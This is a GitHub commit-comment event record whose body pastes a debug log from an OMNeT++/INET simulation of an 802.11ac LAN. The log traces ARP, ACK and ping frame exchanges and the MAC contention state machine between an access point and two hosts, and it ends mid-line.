{"id":"4508464649","type":"CommitCommentEvent","actor":{"login":"andry-tino"},"repo":{"name":"andry-tino/inet"},"payload":{"comment":{"id":18880121,"position":null,"line":null,"path":null,"commit_id":"0ce45a8364b22841de35c48b951d7aa8d152f191","created_at":"2016-09-02T13:20:53Z","updated_at":"2016-09-02T13:20:53Z","body":"Simulation output:\r\n\r\n```\r\n** Event #15  t=0.006235636964  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on arpREQ (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=39)\r\nINFO (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Frame (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREQ received from higher layer, receiver = 10-00-00-00-00-00\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Starting frame exchange inet::ieee80211::SendDataWithAckFrameExchange\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 0\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: handleWithFSM: processing event START\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: leaving state IDLE\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == START && mediumFree)\" holds, taking transition \"Starting-IFS-and-Backoff\" to state IFS_AND_BACKOFF\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: entering state IFS_AND_BACKOFF\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: doStep() in step=0 performed startContention()\r\n** Event #16  t=0.006235636964  Lan80211ac.host[1].wlan[0].mac.ctn[0] (Contention, id=98)  on selfmsg startTx (omnetpp::cMessage, id=12)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Channel access granted\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 1\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: doStep() in step=1 performed transmitFrame()\r\n** Event #22  t=0.006683636964  Lan80211ac.host[1].wlan[0].radio (Ieee80211ScalarRadio, id=90)  on selfmsg transmissionTimer (omnetpp::cMessage, id=14)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Transmission complete\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 2\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: doStep() in step=2 performed expectReplyStartTxWithin()\r\nDEBUG (Ieee80211CompatibleMac)Lan80211ac.host[1].wlan[0].mac: Lan80211ac.host[1].wlan[0].mac: changing radio to receiver mode\r\n** Event #25  t=0.006683989625  Lan80211ac.ap.wlan[0].mac (Ieee80211acMac, id=109)  on arpREQ (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=58)\r\nINFO (Rx)Lan80211ac.ap.wlan[0].mac.rx: Lan80211ac.ap.wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREQ\r\n** Event #27  t=0.006683989625  Lan80211ac.ap.wlan[0].mac (Ieee80211acMac, id=109)  on arpREQ (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=58)\r\nINFO (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Frame (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREQ received from higher layer, receiver = FF-FF-FF-FF-FF-FF\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: handleWithFSM: processing event START\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: leaving state IDLE\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == START && mediumFree)\" holds, taking transition \"Starting-IFS-and-Backoff\" to state IFS_AND_BACKOFF\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: entering state IFS_AND_BACKOFF\r\n** Event #29  t=0.006684354723  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on arpREQ (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=65)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREQ\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Setting NAV to 0.000314\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: handleWithFSM: processing event MEDIUM_STATE_CHANGED\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: condition \"event==MEDIUM_STATE_CHANGED\" holds, staying in current state\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #35  t=0.006905636964  Lan80211ac.host[1].wlan[0].mac.upperMac (DcfUpperMac, id=96)  on selfmsg timeout (omnetpp::cMessage, id=54)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Timeout in step 2\r\n** Event #37  t=0.006997989625  Lan80211ac.ap.wlan[0].radio (Ieee80211ScalarRadio, id=110)  on selfmsg transmissionTimer (omnetpp::cMessage, id=18)\r\nDEBUG (Ieee80211acMac)Lan80211ac.ap.wlan[0].mac: Lan80211ac.ap.wlan[0].mac: changing radio to receiver mode\r\n** Event #40  t=0.006998342247  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=82)\r\nINFO (Rx)Lan80211ac.host[1].wlan[0].mac.rx: Lan80211ac.host[1].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Lower frame received in step 2\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: processReply(): frame PROCESSED in step=2 performed no-op\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 3\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: handleWithFSM: processing event CHANNEL_RELEASED\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: processing event in state OWNING\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: leaving state OWNING\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == CHANNEL_RELEASED)\" holds, taking transition \"Channel-Released\" to state IDLE\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: entering state IDLE\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Frame exchange successful\r\nINFO (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Frame exchange finished\r\n** Event #43  t=0.006998609369  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=85)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #50  t=0.007317989625  Lan80211ac.ap.wlan[0].radio (Ieee80211ScalarRadio, id=110)  on selfmsg transmissionTimer (omnetpp::cMessage, id=18)\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Frame exchange successful\r\nINFO (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Frame exchange finished\r\nDEBUG (Ieee80211acMac)Lan80211ac.ap.wlan[0].mac: Lan80211ac.ap.wlan[0].mac: changing radio to receiver mode\r\n** Event #53  t=0.007318342199  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on arpREQ (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=103)\r\nINFO (Rx)Lan80211ac.host[1].wlan[0].mac.rx: Lan80211ac.host[1].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREQ\r\nINFO (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #55  t=0.007318609345  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on arpREQ (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=106)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREQ\r\n** Event #61  t=0.007318609345  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on arpREPLY (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=114)\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Frame (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREPLY received from higher layer, receiver = 10-00-00-00-00-00\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Starting frame exchange inet::ieee80211::SendDataWithAckFrameExchange\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Doing step 0\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: handleWithFSM: processing event START\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: leaving state IDLE\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == START && mediumFree)\" holds, taking transition \"Starting-IFS-and-Backoff\" to state IFS_AND_BACKOFF\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: entering state IFS_AND_BACKOFF\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: doStep() in step=0 performed startContention()\r\n** Event #62  t=0.007408609345  Lan80211ac.host[0].wlan[0].mac.ctn[0] (Contention, id=59)  on selfmsg startTx (omnetpp::cMessage, id=5)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Channel access granted\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Doing step 1\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: doStep() in step=1 performed transmitFrame()\r\n** Event #69  t=0.007856609345  Lan80211ac.host[0].wlan[0].radio (Ieee80211ScalarRadio, id=51)  on selfmsg transmissionTimer (omnetpp::cMessage, id=7)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Transmission complete\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Doing step 2\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: doStep() in step=2 performed expectReplyStartTxWithin()\r\nDEBUG (Ieee80211CompatibleMac)Lan80211ac.host[0].wlan[0].mac: Lan80211ac.host[0].wlan[0].mac: changing radio to receiver mode\r\n** Event #72  t=0.007857229058  Lan80211ac.ap.wlan[0].mac (Ieee80211acMac, id=109)  on arpREPLY (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=133)\r\nINFO (Rx)Lan80211ac.ap.wlan[0].mac.rx: Lan80211ac.ap.wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREPLY\r\n** Event #74  t=0.007857229058  Lan80211ac.ap.wlan[0].mac (Ieee80211acMac, id=109)  on arpREPLY (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=133)\r\nINFO (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Frame (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREPLY received from higher layer, receiver = 0A-AA-00-00-00-02\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Starting frame exchange inet::ieee80211::SendDataWithAckFrameExchange\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Doing step 0\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: handleWithFSM: processing event START\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: leaving state IDLE\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == START && mediumFree)\" holds, taking transition \"Starting-IFS-and-Backoff\" to state IFS_AND_BACKOFF\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: entering state IFS_AND_BACKOFF\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: doStep() in step=0 performed startContention()\r\n** Event #76  t=0.007857326987  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on arpREPLY (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=139)\r\nINFO (Rx)Lan80211ac.host[1].wlan[0].mac.rx: Lan80211ac.host[1].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREPLY\r\nINFO (Rx)Lan80211ac.host[1].wlan[0].mac.rx: Lan80211ac.host[1].wlan[0].mac.rx: Setting NAV to 0.000314\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: handleWithFSM: processing event MEDIUM_STATE_CHANGED\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: condition \"event==MEDIUM_STATE_CHANGED\" holds, staying in current state\r\nINFO (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #82  t=0.008078609345  Lan80211ac.host[0].wlan[0].mac.upperMac (DcfUpperMac, id=57)  on selfmsg timeout (omnetpp::cMessage, id=129)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Timeout in step 2\r\n** Event #84  t=0.008171229058  Lan80211ac.ap.wlan[0].radio (Ieee80211ScalarRadio, id=110)  on selfmsg transmissionTimer (omnetpp::cMessage, id=18)\r\nDEBUG (Ieee80211acMac)Lan80211ac.ap.wlan[0].mac: Lan80211ac.ap.wlan[0].mac: changing radio to receiver mode\r\n** Event #88  t=0.008171581581  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=156)\r\nINFO (Rx)Lan80211ac.host[1].wlan[0].mac.rx: Lan80211ac.host[1].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nINFO (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #90  t=0.00817184875  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=159)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Lower frame received in step 2\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: processReply(): frame PROCESSED in step=2 performed no-op\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Doing step 3\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: handleWithFSM: processing event CHANNEL_RELEASED\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: processing event in state OWNING\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: leaving state OWNING\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == CHANNEL_RELEASED)\" holds, taking transition \"Channel-Released\" to state IDLE\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: entering state IDLE\r\nDETAIL (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Frame exchange successful\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: Frame exchange finished\r\n** Event #92  t=0.008641229058  Lan80211ac.ap.wlan[0].mac.ctrl (CollisionController, id=123)  on selfmsg txStart-0 (omnetpp::cMessage, id=63)\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Channel access granted\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Doing step 1\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: doStep() in step=1 performed transmitFrame()\r\n** Event #98  t=0.008679229058  Lan80211ac.ap.wlan[0].radio (Ieee80211ScalarRadio, id=110)  on selfmsg transmissionTimer (omnetpp::cMessage, id=18)\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Transmission complete\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Doing step 2\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: doStep() in step=2 performed expectReplyStartTxWithin()\r\nDEBUG (Ieee80211acMac)Lan80211ac.ap.wlan[0].mac: Lan80211ac.ap.wlan[0].mac: changing radio to receiver mode\r\n** Event #101  t=0.008679581522  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on arpREPLY (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=178)\r\nINFO (Rx)Lan80211ac.host[1].wlan[0].mac.rx: Lan80211ac.host[1].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREPLY\r\n** Event #106  t=0.008679581522  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on ping0 (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=186)\r\nINFO (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Frame (inet::ieee80211::Ieee80211DataFrameWithSNAP)ping0 received from higher layer, receiver = 10-00-00-00-00-00\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Starting frame exchange inet::ieee80211::SendDataWithAckFrameExchange\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 0\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: handleWithFSM: processing event START\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: leaving state IDLE\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == START && mediumFree)\" holds, taking transition \"Starting-IFS-and-Backoff\" to state IFS_AND_BACKOFF\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: entering state IFS_AND_BACKOFF\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: doStep() in step=0 performed startContention()\r\n** Event #108  t=0.008679848712  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on arpREPLY (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=189)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)arpREPLY\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Setting NAV to 0.000314\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: handleWithFSM: processing event MEDIUM_STATE_CHANGED\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: condition \"event==MEDIUM_STATE_CHANGED\" holds, staying in current state\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #114  t=0.008901229058  Lan80211ac.ap.wlan[0].mac.upperMac (MuEnabledDcfUpperMac, id=116)  on selfmsg timeout (omnetpp::cMessage, id=174)\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Timeout in step 2\r\n** Event #116  t=0.008993581522  Lan80211ac.host[1].wlan[0].radio (Ieee80211ScalarRadio, id=90)  on selfmsg transmissionTimer (omnetpp::cMessage, id=14)\r\nDEBUG (Ieee80211CompatibleMac)Lan80211ac.host[1].wlan[0].mac: Lan80211ac.host[1].wlan[0].mac: changing radio to receiver mode\r\n** Event #120  t=0.008993933982  Lan80211ac.ap.wlan[0].mac (Ieee80211acMac, id=109)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=206)\r\nINFO (Rx)Lan80211ac.ap.wlan[0].mac.rx: Lan80211ac.ap.wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Lower frame received in step 2\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: processReply(): frame PROCESSED in step=2 performed no-op\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Doing step 3\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: handleWithFSM: processing event CHANNEL_RELEASED\r\nDEBUG 